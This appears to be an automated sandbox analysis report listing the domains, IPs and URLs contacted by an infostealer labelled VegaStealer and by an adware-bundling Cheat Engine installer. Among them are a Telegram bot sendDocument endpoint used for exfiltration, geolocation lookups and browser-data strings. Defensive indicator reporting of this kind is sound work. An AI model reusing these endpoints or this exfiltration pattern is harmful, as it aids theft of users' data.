                                  http://www.microsoft.cx0%Avira URL Cloudsafe
                                  https://d34hwk9wxgk5fi.cloudfront.net/K0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  bg.microsoft.map.fastly.net
                                  199.232.214.172
                                  truefalse
                                    high
                                    cheatengine.org
                                    104.20.94.94
                                    truefalse
                                      high
                                      d31tu1fsc224h4.cloudfront.net
                                      13.226.4.166
                                      truefalse
                                        unknown
                                        eu-api.openweathermap.org
                                        57.129.2.123
                                        truefalse
                                          high
                                          ipbase.com
                                          104.21.85.189
                                          truefalse
                                            high
                                            d34hwk9wxgk5fi.cloudfront.net
                                            65.9.108.148
                                            truefalse
                                              unknown
                                              ip-api.com
                                              208.95.112.1
                                              truefalse
                                                high
                                                freegeoip.app
                                                172.67.160.84
                                                truefalse
                                                  high
                                                  d2axwe94icddzf.cloudfront.net
                                                  18.66.161.99
                                                  truefalse
                                                    unknown
                                                    d14mh4uvqj4iiz.cloudfront.net
                                                    18.66.161.123
                                                    truefalse
                                                      unknown
                                                      shield.reasonsecurity.com
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        api.openweathermap.org
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          electron-shell.reasonsecurity.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://ip-api.com/json/?fields=61439false
                                                              high
                                                              https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://ip-api.com/json/false
                                                                high
                                                                https://freegeoip.app/xml/false
                                                                  high
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://duckduckgo.com/chrome_newtabv2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drfalse
                                                                    high
                                                                    https://webcompanion.com/termsCheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://duckduckgo.com/ac/?q=v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drfalse
                                                                        high
                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgICheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://home.mcafee.com/Root/AboutUs.aspx?id=eulaCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.premieropinion.com/privacy-policylCheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://shield.reasonsecurity.com/rsStubActivator.exe.CheatEngine75.tmp, 00000008.00000002.3310876008.000000000758A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d34hwk9wxgk5fi.cloudfront.net/f/CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.00000000035F9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://freegeoip.appv2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSPCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.premieropinion.com/common/termsofservice-v1CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CB6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xLCheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://ns.adobe.0/v2.exe, 00000007.00000002.2192717711.0000000007A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://go.microsofVegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.remobjects.com/psCheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                  high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.innosetup.com/CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                      high
                                                                                      https://www.sqlite.org/lang_corefunc.htmlVegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.drfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namev2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://assets.razerzone.com/downloads/software/RazerEndUserCheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnetCheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdvCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crl3.digicert.cPom/DVegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.ccleaner.com/legal/end-user-license-agreementCheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://steamcommunity.com/profiles/ASOFTWAREVegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                  high
                                                                                                  http://crl3.digicertVegaStealer_v2.exe, 00000005.00000003.2039557081.0000000000E0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.pngCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.microsoft.cxxpowershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yHCheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://shield.reasonsecurity.com/rsStubActivator.exemCheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drfalse
                                                                                                        high
                                                                                                        https://www.opera.com/he/eula/computersCheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://reasonlabs.com/policiesxCheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drfalse
                                                                                                              high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.mcafee.com/consumer/en-us/policy/legal.html4CheatEngine75.tmp, 00000008.00000003.2210401005.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2392056677.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.opera.com/he/eula/computerslCheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://urn.to/r/sds_seeSystem.Data.SQLite.dll.5.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/novotnyllc/bc-csharpVegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zipCheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjyCheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://d31tu1fsc224h4.cloudfront.net/INCheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://ocsp.sectigo.com0CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://system.data.sqlite.org/XVegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2187538856.00000000059F4000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.drfalse
                                                                                                                            high
                                                                                                                            https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xLCheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.avg.com/ww-en/privacy..$CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ip-api.com/json/?fieldsTDlv2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.avast.coCheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://webcompanion.com/terms5/=CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://reasonlabs.com/policiesCheatEngine75.tmp, 00000008.00000002.3310876008.000000000755F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://d34hwk9wxgk5fi.cloudfront.net:443/zbdCheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://reasonlabs.com/policies67rCheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://go.microsoftVegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.avast.com/eCheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://t.me/VegaStealer_botVegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://ipbase.comv2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.avast.comCheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.avast.com/pCheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdfCheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://cacerts.diVegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.sqlite.org/lang_cVegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://t.me/VegaStealer_bot-/sendDocument?chat_id=VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icov2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.premieropinion.com/privacy-policy-CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000D.00000002.2188691626.000002504DFCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.avast.com/eulaCheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://d31tu1fsc224h4.cloudfront.net:443/gdCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pngeCheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.sqlite.org/copyright.html2VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.dk-soft.org/CheatEngine75.exe, 00000006.00000002.3278514154.0000000002196000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000075AF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://freegeoip.app/xml/9https://api.telegram.org/botGhttps://api.vimeworld.ru/user/name/1--------VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.ccleaner.com/legal/end-useCheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://go.microVegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yCheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://d31tu1fsc224h4.cloudfront.net/FbNCheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
